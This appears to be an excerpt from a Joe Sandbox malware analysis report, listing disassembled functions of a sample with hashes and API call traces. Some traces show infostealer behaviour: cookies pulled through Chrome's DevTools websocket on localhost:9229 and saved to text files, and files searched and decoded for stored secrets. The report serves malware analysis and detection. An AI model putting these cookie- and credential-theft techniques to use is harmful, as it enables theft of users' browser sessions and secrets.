Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
Instruction ID: 683273e64459584920a51cd19a7e4d80a31ac76df9d38907cb404440e2cf26f0
Opcode Fuzzy Hash: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
Instruction Fuzzy Hash: BDF05E79A0020A9FCB00DF69D9C088EB7F9FF89224B24C065ED089B305D334E952CF91

Function 61E2D595 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
Instruction ID: 44e553df0f6153727c0ccd70e02d170a2b8fbf64feb92f11989a6743949971bc
Opcode Fuzzy Hash: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
Instruction Fuzzy Hash: 64F08934604619DBCB00EF99EDC489EBBB4FF49264F10C495ED948B354DB30D86587D1

Function 61E1307A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
Instruction ID: 20361dabe9e5e624aead0c2cbcda463e1dc5d30ecc087adce6a46ccbc9e5f0dc
Opcode Fuzzy Hash: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
Instruction Fuzzy Hash: 01F01C310186858BD7098B689466BA0BFE4AB02328F28C7F9E86D0F7D7C67195C4C790

Function 61E2D945 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
Instruction ID: 49fe5c7db6ee1c100769216236de79f0150f8c1617bfc082eb282041d978b41e
Opcode Fuzzy Hash: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
Instruction Fuzzy Hash: A4F04EB9A4535D9FDB00CF0AD8C1ADABBA8FB0C260F94811AFE1857341C274A9508BE1

Function 61E2D65B Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
Instruction ID: 214e4a77422a75c172c9c2064a368b9d1fba0603b708cc731de69edf92eb1139
Opcode Fuzzy Hash: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
Instruction Fuzzy Hash: EEE0E678A042495FDB00DF65D4C054AB7B5FF48258B24C165DD484B305D231E995CBC1

Function 61E2D981 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
Instruction ID: 0770371ec9a44e43cdd5cf4ef26b08e67e6dab9ce041578c4bbee247c5ef0355
Opcode Fuzzy Hash: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
Instruction Fuzzy Hash: 54E0B6B550531DAFCB00CF09D8849CABBA8FB08260F10811AFD145B301C371E910CBE0

Function 00419AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 61E2D635 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction ID: e794d2b72a1fc6c6090aef49fcd2ae8b4ab6f64d521491744c60cc3bf2b3839a
Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction Fuzzy Hash: 8ED092B8909349AFCB00EF29C48544EBBE4BF88258F40C82DFC98C7311E274E8408F92

Function 61E037F3 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction ID: de6271d013a038b850d850acc4260bf908e6486e870890920c4c51f453ae2ee2
Opcode Fuzzy Hash: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction Fuzzy Hash: C7B0123B11030CCB4700DD0DD441CC1B3D8F708E127C104D0E41087701D669F800C685

Function 00409BE0 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 141stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A

memset.MSVCRT ref: 00409C33
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
connect_to_websocket.CHROME(?,00000000), ref: 00409C76
memset.MSVCRT ref: 00409C9A
lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
lstrcatA.KERNEL32(?,?), ref: 00409CD5
lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
lstrcatA.KERNEL32(?,?), ref: 00409CFB
lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
lstrlenA.KERNEL32(00000000), ref: 00409D17
lstrlenA.KERNEL32(00000000), ref: 00409D26

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memset.MSVCRT ref: 00409D7E
free_result.CHROME(00000000), ref: 00409D8B

Strings

.txt, xrefs: 00409D01
cookies, xrefs: 00409CA3
ws://localhost:9229, xrefs: 00409C3C
localhost, xrefs: 00409BF5
/devtools, xrefs: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2548846003-3542011879
Opcode ID: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
Instruction ID: 9597081ec4872356d8a1e20e182716cfae729ad967be985c4dfb38bd464ab4a8
Opcode Fuzzy Hash: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
Instruction Fuzzy Hash: 74516D71D10518ABCB14EBA0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69

Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
lstrcatA.KERNEL32(?,00000000,0096C2E8,0042156C,0096C2E8,00421568,00000000), ref: 0040D308
lstrcatA.KERNEL32(?,00421570), ref: 0040D317
lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
lstrcatA.KERNEL32(?,00421574), ref: 0040D339
lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
lstrcatA.KERNEL32(?,00000000), ref: 0040D390
lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(?), ref: 0040D42A
lstrlenA.KERNEL32(?), ref: 0040D439
memset.MSVCRT ref: 0040D488

Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F

DeleteFileA.KERNEL32(00000000), ref: 0040D4B4

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: 758fee104ac8deea31483978b3f596230ba7669fd82ede4edbd6f751ab8f3e45
Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
Opcode Fuzzy Hash: 758fee104ac8deea31483978b3f596230ba7669fd82ede4edbd6f751ab8f3e45
Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A

Function 61E100D7 Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 280COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E100FC
memcmp.MSVCRT ref: 61E10131
memcmp.MSVCRT ref: 61E10580

Strings

ous, xrefs: 61E10618
ize, xrefs: 61E1065C
ive, xrefs: 61E1063A
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction ID: a6745917a23cee73da34d97950539bfd860ce037a133a9b2c34405b562b65f13
Opcode Fuzzy Hash: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction Fuzzy Hash: 90C127B0E083068BDB00DF94C58669EBBF4AF85348F31C81ED890DB754D779D5A68B92

Function 0040CA90 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00974020,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
StrStrA.SHLWAPI(?,00973F00,00420B56), ref: 0040CBF7
StrStrA.SHLWAPI(00000000,00973F30), ref: 0040CC1E
StrStrA.SHLWAPI(?,00974340,00000000,?,00421550,00000000,?,00000000,00000000,?,0096C2B8,00000000,?,0042154C,00000000,?), ref: 0040CDA2
StrStrA.SHLWAPI(00000000,00974520), ref: 0040CDB9

Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0096C398), ref: 0040C971
Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12

StrStrA.SHLWAPI(?,00974520,00000000,?,00421554,00000000,?,00000000,0096C398), ref: 0040CE5A
StrStrA.SHLWAPI(00000000,0096C508), ref: 0040CE71

Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

lstrlenA.KERNEL32(00000000), ref: 0040CF44
CloseHandle.KERNEL32(00000000), ref: 0040CF9C

Strings

, xrefs: 0040CAC6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 1564132460-3916222277
Opcode ID: 8709eecf1a42231e7a8c988e9ebd6b9a3b86df2585319a07ee50d62771e0678a
Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
Opcode Fuzzy Hash: 8709eecf1a42231e7a8c988e9ebd6b9a3b86df2585319a07ee50d62771e0678a
Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00411A15
ExitProcess.KERNEL32 ref: 00411A21
